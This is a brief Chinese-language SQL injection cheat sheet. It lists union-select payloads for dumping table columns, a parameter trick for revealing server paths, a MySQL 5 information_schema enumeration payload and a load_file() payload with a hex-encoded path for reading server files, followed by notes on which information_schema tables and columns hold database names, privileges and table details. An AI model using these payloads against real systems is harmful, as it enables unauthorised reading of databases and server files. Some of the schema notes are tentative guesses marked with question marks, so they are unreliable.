1.and 1=2 union select 1,CONCAT(列名,0x7C,列名) from 表名/*

2.id[]=1暴路径

3.mysql5 : and 1=2 union select TABLE_SCHEMA,COLUMN_NAME from information_schema.STATISTICS/*

4.,CONCAT(0x5F46696C6553746172745F,load_file(0x433A5C626F6F742E696E69),0x5F46696C65456E645F)

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

1: KEY_COLUMN_USAGE表


constraint_schema: 存放数据库名


table_schema: 存放数据库名


table_name: 存放数据库表信息


column_name: 存放数据库的字段信息,一般可以获取第一个字段或者自增字段的信息





2: SCHEMA表


schema_name: 存放数据库名


default_charater_set_name: 存放charset类型


default_collation_name: 存放charset相关信息





3: SCHEMA_PRIVILEGES表


grantee: 存放数据库用户名


table_schema: 表名


privilege_type: 权限





4: STATISTICS表


table_schema: 存放数据库名


table_name: 存放表名


index_schema: 数据库名


index_name: 是否缩引?


column_name: 存放索引自增字段?





5: TABLES表


table_schema: 存放数据库名


table_name: 存放表名


table_type: 表类型 SYSTEM or BASE TABLE


engin: MEMORY MYISAM InnoDB


version:


table_rows:表的行数


auto_increment: 自增的总行数


create_time: 创建表的时间


update_time: 更新表的时间


create_options: 创建表时的约束条件